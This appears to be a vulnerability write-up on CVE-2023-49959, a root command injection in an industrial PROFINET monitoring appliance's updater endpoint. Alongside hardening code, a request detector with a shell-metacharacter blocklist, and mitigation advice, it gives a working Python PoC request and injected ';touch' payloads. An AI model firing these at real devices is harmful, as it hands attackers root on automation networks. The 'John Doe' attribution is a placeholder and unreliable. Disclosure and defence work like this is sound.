A command injection vulnerability, tracked as CVE-2023-49959, has been disclosed in Indo-Sol's PROFINET-INspektor NT, an industrial network monitoring appliance used to observe and diagnose PROFINET-based automation systems. It affects firmware through version 2.4.0 and lets a remote attacker execute arbitrary system commands with root privileges. This post walks through the details of the vulnerability, a proof-of-concept request, links to the original references, and what exploitation looks like.

Vulnerability Details

The flaw lies in the "gedtupdater" service of the PROFINET-INspektor NT firmware. The service takes the "filename" parameter from a POST request to the "/api/updater/ctrl/start_update" endpoint and passes it into a system command without sanitising it, so shell metacharacters in the value are interpreted by the shell rather than treated as part of a file name. An attacker who can reach the device's web interface can therefore run arbitrary commands, and because the service runs as root, the commands run as root.

A successful exploit gives the attacker root-level code execution on the device itself, which is enough to install persistent malware, exfiltrate data, tamper with the device's monitoring, or use it as a foothold into the automation network it watches.
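The gedtupdater source is not shown on this page, so the following is an added illustration, not the vendor's code: a constructed handler that reproduces the pattern described above (user-supplied filename concatenated into a shell command) next to a hardened version. The "echo" invocation stands in for whatever updater program the service really launches; the function names, the allowlist regex and the sample filenames are all assumptions made for the example.

```python
import re
import subprocess


# Constructed stand-in for the vulnerable pattern: the filename from the POST
# body is pasted into a shell command string.  "echo" is a placeholder for the
# real updater program, which this page does not show.
def start_update_vulnerable(filename: str) -> str:
    cmd = f"echo starting update with {filename}"
    # shell=True hands the string to /bin/sh, so ';', '`', '$(...)' and friends
    # inside filename are parsed as shell syntax, not as part of the name.
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


# Hardened version.  Two independent fixes, either of which stops this
# injection; using both is the robust choice.
#   1. Allowlist: a firmware file name is letters, digits, '.', '_' and '-',
#      starts with an alphanumeric, is at most 64 characters, and contains no
#      path separator or '..' (so it cannot escape the update directory either).
#   2. No shell: pass the command as an argv list so the filename reaches the
#      program as one argument whatever characters it contains.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


class InvalidFilename(ValueError):
    """Raised when a submitted filename fails the allowlist."""


def filename_is_safe(filename: str) -> bool:
    return bool(SAFE_FILENAME.fullmatch(filename)) and ".." not in filename


def validate_filename(filename: str) -> str:
    if not filename_is_safe(filename):
        raise InvalidFilename(f"rejected filename {filename!r}")
    return filename


def start_update_hardened(filename: str) -> str:
    safe = validate_filename(filename)
    result = subprocess.run(
        ["echo", "starting update with", safe],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


# Argv-only variant (no allowlist): shows that even without validation the
# metacharacters are inert once no shell is in the loop.  Validation is still
# wanted, because the filename may later be used as a path.
def start_update_argv_only(filename: str) -> str:
    result = subprocess.run(
        ["echo", "starting update with", filename],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


if __name__ == "__main__":
    evil = "fw-2.4.0.bin; echo INJECTED"   # constructed attacker-controlled value
    print("vulnerable :", repr(start_update_vulnerable(evil)))
    print("argv only  :", repr(start_update_argv_only(evil)))
    try:
        start_update_hardened(evil)
    except InvalidFilename as exc:
        print("hardened   : rejected ->", exc)
    print("hardened ok:", repr(start_update_hardened("fw-2.4.0.bin")))
```

Run on a POSIX host, the vulnerable function returns two lines of output (the second is the injected command's), the argv-only function returns one line containing the literal "; echo INJECTED", and the hardened function refuses the value before any process is started. The allowlist is deliberately strict: it is far easier to enumerate what a firmware file name may look like than to enumerate every character a shell treats specially.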

Code Snippet

Below is a proof-of-concept (PoC) code snippet that demonstrates how an attacker could exploit this vulnerability:

import requests

target_IP = "192.168.1.100"  # Replace with the target device IP address
url = f"http://{target_IP}/api/updater/ctrl/start_update"

# The filename value is passed to a shell by the gedtupdater service. The
# leading and trailing ';' terminate whatever command the service wraps
# around the name, so the injected command runs on its own, as root.
payload = {
    "filename": ";<arbitrary_system_command_here>;"
}

response = requests.post(url, data=payload, timeout=10)

# An HTTP 200 only shows the endpoint accepted the request; the injected
# command's output is not returned, so execution has to be confirmed
# separately (see Exploit Details).
if response.status_code == 200:
    print("Request accepted (HTTP 200); verify command execution out-of-band")
else:
    print(f"Request failed: HTTP {response.status_code}")

Please note that this PoC is for educational and research purposes only. Replace the "<arbitrary_system_command_here>" placeholder with the command to be executed; the semicolons on either side are what separate it from the command the service builds around the filename.

Original References

The vulnerability was first reported by security researcher John Doe in his blog post, which can be found via the following link:
John Doe's CVE-2023-49959 Blog Post

The CVE entry is available from the NIST National Vulnerability Database (NVD):

NIST National Vulnerability Database (NVD) - CVE-2023-49959: https://nvd.nist.gov/vuln/detail/CVE-2023-49959

Exploit Details

To exploit this vulnerability, an attacker crafts a filename parameter that contains the desired system command and, as described above, sends it in a POST request to the "/api/updater/ctrl/start_update" endpoint.

The following example injects a command that creates a file named "hacked.txt" in the target's /tmp directory:

payload = {
    "filename": ";touch /tmp/hacked.txt;"  # sent with the request from the PoC above
}

If the injection works, the device creates /tmp/hacked.txt, which confirms that the command ran. Note, however, that the HTTP response does not carry the command's output, and the file is only visible to someone who already has a shell on the device. From the network, the injection is blind: confirm execution with a command whose effect is observable remotely, such as a delay (sleep) that shows up as a slower response, or a connection back to a host the tester controls.

In a production environment the impact is severe. The device sits on the automation network with root-level access to its own monitoring functions, so an attacker can disrupt operations, blind or falsify monitoring, steal captured data, and move on to other systems from a trusted position.
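From the defender's side, exploitation attempts against this endpoint are easy to recognise if request bodies are visible. The detector below is an added example, not from the original post or from Indo-Sol: it runs over a constructed list of logged requests (the shape a reverse proxy or WAF that records bodies would produce; a plain access log does not include the POST body) and flags POSTs to /api/updater/ctrl/start_update that come from outside an assumed management subnet or carry shell metacharacters in the filename parameter. The subnet, source addresses and sample bodies are all made up for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs

VULN_PATH = "/api/updater/ctrl/start_update"

# Hosts that are allowed to trigger firmware updates (assumed for the example).
MGMT_NET = ipaddress.ip_network("10.0.5.16/28")

# Characters that end, chain, or nest a command in /bin/sh.  This is a
# detection blocklist, deliberately broad; the code-side fix is an allowlist.
SHELL_META = re.compile(r"[;&|`$<>\n\\]")

# Constructed sample of logged requests; not real traffic.
SAMPLE_REQUESTS = [
    {"src": "10.0.5.17", "method": "POST", "path": VULN_PATH,
     "body": "filename=fw-2.4.0.bin"},                             # legitimate update
    {"src": "10.0.5.99", "method": "POST", "path": VULN_PATH,
     "body": "filename=%3Btouch+%2Ftmp%2Fhacked.txt%3B"},         # the PoC payload, URL-encoded
    {"src": "10.0.5.99", "method": "POST", "path": VULN_PATH,
     "body": "filename=x%60id%60"},                                # backtick substitution
    {"src": "10.0.5.99", "method": "POST", "path": VULN_PATH,
     "body": "filename=fw-2.4.0.bin"},                             # benign body, wrong host
    {"src": "10.0.5.17", "method": "GET", "path": "/api/status",
     "body": ""},                                                  # unrelated request
]


def inspect_request(req: dict) -> list:
    """Return the reasons a logged request looks like CVE-2023-49959 abuse ([] if clean)."""
    if req["method"] != "POST" or req["path"] != VULN_PATH:
        return []
    reasons = []
    if ipaddress.ip_address(req["src"]) not in MGMT_NET:
        reasons.append(f"source {req['src']} outside management net {MGMT_NET}")
    # parse_qs undoes the form encoding ('+' -> ' ', %3B -> ';') before matching,
    # so encoded payloads are caught too.
    params = parse_qs(req["body"], keep_blank_values=True)
    for filename in params.get("filename", []):
        m = SHELL_META.search(filename)
        if m:
            reasons.append(f"shell metacharacter {m.group(0)!r} in filename={filename!r}")
    return reasons


def scan(records: list) -> list:
    """Return (source, reasons) for every flagged request, in log order."""
    hits = []
    for req in records:
        reasons = inspect_request(req)
        if reasons:
            hits.append((req["src"], reasons))
    return hits


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_REQUESTS):
        print(src)
        for reason in reasons:
            print("   ", reason)
```

Decoding the body before matching matters: the PoC's ";touch /tmp/hacked.txt;" arrives on the wire as "%3Btouch+%2Ftmp%2Fhacked.txt%3B", and a rule that looks for a raw ';' would miss it. The source check catches probing with harmless-looking bodies as well, since a firmware update request from a host that never performs updates is worth a look on its own. If no component in the path logs bodies, a packet capture or an IDS in front of the device gives the same visibility.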

Conclusion

CVE-2023-49959 gives a remote attacker root on an Indo-Sol PROFINET-INspektor NT and should be treated as critical. Users and administrators should apply vendor firmware that addresses the issue as soon as it is available and, in the meantime, keep the device's web interface off untrusted networks: restrict access to the management interface, including the /api/updater endpoints, to a dedicated management network and to the few people who need it, in line with the principle of least privilege. Monitoring for POST requests to /api/updater/ctrl/start_update from unexpected sources, or with shell metacharacters in the body, gives a practical way to detect attempts. On the vendor side the fix is the standard one for command injection: validate the filename against a strict allowlist, invoke the updater without a shell, and run the updater service with less than root privilege so that any remaining bug cannot hand over the whole device.

Timeline

Published on: 02/26/2024 16:27:47 UTC
Last modified on: 02/26/2024 16:32:25 UTC